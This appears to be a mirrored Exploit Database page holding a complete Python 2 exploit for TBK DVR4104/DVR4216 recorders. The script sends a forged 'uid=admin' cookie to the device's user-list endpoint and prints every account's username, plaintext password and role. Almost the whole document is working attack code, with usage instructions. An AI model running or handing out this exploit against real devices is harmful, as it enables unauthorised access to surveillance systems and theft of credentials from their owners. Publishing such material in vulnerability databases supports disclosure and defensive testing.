TBK DVR4104 / DVR4216 – Credentials Leak

• Exploit Database
• 15 阅读

• 作者： ezelf
  日期： 2018-05-02
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44577/

• # -*- coding: utf-8 -*- 
  import json
  import requests
  import argparse
  import tableprint as tp
  
  class Colors:
  BLUE= '\033[94m'
  GREEN = '\033[32m'
  RED = '\033[0;31m'
  DEFAULT = '\033[0m'
  ORANGE= '\033[33m'
  WHITE = '\033[97m'
  BOLD= '\033[1m'
  BR_COLOUR = '\033[1;37;40m'
  
  banner = '''
   __..--.._
  ......--~.....`.
  .":"`-....' ..-'":". `
  ` `._ ` _.'`"( `-"'`._ ' _.' '
   ~~~`.~~~
  .'
   /
  (
   ^---'
  
  
   [*] @capitan_alfa
  '''
  
  details = ''' 
   # Exploit Title: DVRs; Credentials Exposed
   # Date:09/04/2018
   # Exploit Author:Fernandez Ezequiel ( @capitan_alfa )
  '''
  parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',
  description=' [+] Obtaining Exposed credentials', 
  epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81',
  version="1.1")
  
  parser.add_argument('--host', dest="HOST",help='Host',required=True)
  parser.add_argument('--port', dest="PORT",help='Port',default=80)
  
  args= parser.parse_args()
  
  HST = args.HOST
  port= args.PORT
  
  headers = {}
  
  fullHost_1= "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"
  host= "http://"+HST+":"+str(port)+"/"
  
  print Colors.GREEN+banner+Colors.DEFAULT
  
  
  def makeReqHeaders(xCookie):
  headers["Host"] =host
  headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"
  headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3"
  headers["Connection"] = "close"
  headers["Content-Type"] = "text/html"
  headers["Cookie"] = "uid="+xCookie
  
  return headers
  
  try:
  rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)
  except Exception,e:
  print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT
  exit()
  
  badJson = rX.text
  try:
  dataJson = json.loads(badJson)
  totUsr = len(dataJson["list"]) #--> 10
  except Exception, e:
  print " [+] Error: "+str(e)
  print " [>] json: "+str(rX)
  #print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin"))
  exit()
  
  
  print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN
  print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT
  
  print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT
  print " "
  
  final_data = []
  try:
  for obj in range(0,totUsr):
  
  temp = []
  
  _usuario= dataJson["list"][obj]["uid"]
  _password = dataJson["list"][obj]["pwd"]
  _role = dataJson["list"][obj]["role"]
  
  temp.append(_usuario) 
  temp.append(_password)
  temp.append(_role)
  
  final_data.append(temp)
  
  hdUsr= Colors.GREEN + "Username" + Colors.DEFAULT
  hdPass = Colors.GREEN + "Password" + Colors.DEFAULT
  hdRole = Colors.GREEN + "Role ID"+ Colors.DEFAULT
  
  cabeceras = [hdUsr, hdPass, hdRole] 
  
  tp.table(final_data, cabeceras, width=20)
  
  except Exception, e:
  print "\n [!]: "+str(e)
  print " [+] "+ str(dataJson)
  
  print "\n"